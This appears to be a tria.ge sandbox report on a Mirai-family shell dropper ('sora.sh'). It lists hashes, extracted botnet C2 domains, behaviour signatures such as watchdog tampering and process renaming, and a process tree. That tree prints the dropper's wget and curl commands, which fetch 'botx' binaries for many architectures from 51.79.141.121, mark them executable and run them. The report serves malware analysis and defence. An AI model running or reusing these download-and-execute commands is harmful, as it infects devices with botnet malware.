Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
152s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
29/12/2024, 21:33
Static task
static1
Behavioral task
behavioral1
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
51.79.141.121-sora.sh-2024-12-29T211113.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
51.79.141.121-sora.sh-2024-12-29T211113.sh
-
Size
2KB
-
MD5
0569b09a5951d5fe444efa1892b87687
-
SHA1
0d3df40a37ec718be33d83c1c9a962e982a51d17
-
SHA256
6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa
-
SHA512
fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d
Malware Config
Extracted
mirai
CONDI
botnet.tfmobile.store
report.tfmobile.store
Signatures
-
Mirai family
-
Contacts a large (37233) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1545 chmod 1561 chmod 1503 chmod 1511 chmod 1577 chmod 1486 chmod 1537 chmod 1553 chmod 1593 chmod 1529 chmod 1569 chmod 1585 chmod 1495 chmod 1519 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 1487 robben /tmp/robben 1496 robben /tmp/robben 1504 robben /tmp/robben 1512 robben /tmp/robben 1520 robben /tmp/robben 1530 robben /tmp/robben 1538 robben /tmp/robben 1546 robben /tmp/robben 1554 robben /tmp/robben 1562 robben /tmp/robben 1570 robben /tmp/robben 1578 robben /tmp/robben 1586 robben /tmp/robben 1594 robben -
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
Enumerates active TCP sockets 1 TTPs 13 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben -
Writes file to system bin folder 14 IoCs
description ioc Process File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben File opened for modification /sbin/watchdog robben -
Changes its process name 14 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 1487 robben Changes the process name, possibly in an attempt to hide itself 1496 robben Changes the process name, possibly in an attempt to hide itself 1504 robben Changes the process name, possibly in an attempt to hide itself 1512 robben Changes the process name, possibly in an attempt to hide itself 1520 robben Changes the process name, possibly in an attempt to hide itself 1530 robben Changes the process name, possibly in an attempt to hide itself 1538 robben Changes the process name, possibly in an attempt to hide itself 1546 robben Changes the process name, possibly in an attempt to hide itself 1554 robben Changes the process name, possibly in an attempt to hide itself 1562 robben Changes the process name, possibly in an attempt to hide itself 1570 robben Changes the process name, possibly in an attempt to hide itself 1578 robben Changes the process name, possibly in an attempt to hide itself 1586 robben Changes the process name, possibly in an attempt to hide itself 1594 robben -
Reads system network configuration 1 TTPs 13 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben File opened for reading /proc/net/tcp robben -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1489 wget 1491 curl -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/botx.arm7 wget File opened for modification /tmp/botx.arm7 curl File opened for modification /tmp/botx.ppc curl File opened for modification /tmp/botx.arm4 curl File opened for modification /tmp/botx.arm5 curl File opened for modification /tmp/botx.arm6 wget File opened for modification /tmp/botx.sh4 wget File opened for modification /tmp/botx.sh4 curl File opened for modification /tmp/botx.mips curl File opened for modification /tmp/botx.mpsl wget File opened for modification /tmp/botx.mpsl curl File opened for modification /tmp/botx.arm6 curl File opened for modification /tmp/botx.m68k curl File opened for modification /tmp/botx.x86 wget File opened for modification /tmp/botx.x86 curl File opened for modification /tmp/botx.i468 curl File opened for modification /tmp/botx.i686 curl File opened for modification /tmp/botx.arm5 wget File opened for modification /tmp/botx.ppc wget File opened for modification /tmp/botx.ppc440fp curl File opened for modification /tmp/botx.m68k wget File opened for modification /tmp/robben 51.79.141.121-sora.sh-2024-12-29T211113.sh File opened for modification /tmp/botx.mips wget File opened for modification /tmp/botx.x86_64 curl
Processes
-
/tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh/tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh1⤵
- Writes file to tmp directory
PID:1464 -
/usr/bin/wgetwget http://51.79.141.121/where/botx.x862⤵
- Writes file to tmp directory
PID:1465
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.x862⤵
- Writes file to tmp directory
PID:1478
-
-
/bin/catcat botx.x862⤵PID:1485
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K2⤵
- File and Directory Permissions Modification
PID:1486
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:1487
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1489
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1491
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K2⤵
- File and Directory Permissions Modification
PID:1495
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1496
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.x86_642⤵PID:1498
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.x86_642⤵
- Writes file to tmp directory
PID:1499
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K2⤵
- File and Directory Permissions Modification
PID:1503
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1504
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.i4682⤵PID:1506
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.i4682⤵
- Writes file to tmp directory
PID:1507
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K2⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1512
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.i6862⤵PID:1514
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.i6862⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-tomK8K2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1520
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.mpsl2⤵
- Writes file to tmp directory
PID:1522
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.mpsl2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1530
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm42⤵PID:1532
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm42⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1538
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm52⤵
- Writes file to tmp directory
PID:1540
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm52⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1546
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm62⤵
- Writes file to tmp directory
PID:1548
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm62⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1554
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.arm72⤵
- Writes file to tmp directory
PID:1556
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.arm72⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1562
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.ppc2⤵
- Writes file to tmp directory
PID:1564
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.ppc2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1570
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.ppc440fp2⤵PID:1572
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.ppc440fp2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1578
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.m68k2⤵
- Writes file to tmp directory
PID:1580
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.m68k2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1586
-
-
/usr/bin/wgetwget http://51.79.141.121/where/botx.sh42⤵
- Writes file to tmp directory
PID:1588
-
-
/usr/bin/curlcurl -O http://51.79.141.121/where/botx.sh42⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/chmodchmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.sh4 botx.x86 botx.x86_64 config-err-KaZKo5 netplan_shzgbutu robben snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy32⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1594
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD51092f7846a6ca7a5e92ece0ea93ff82e
SHA1140fd3e84c49d382e6b0f9a40730d1cd465f8347
SHA256a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2
SHA51211ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba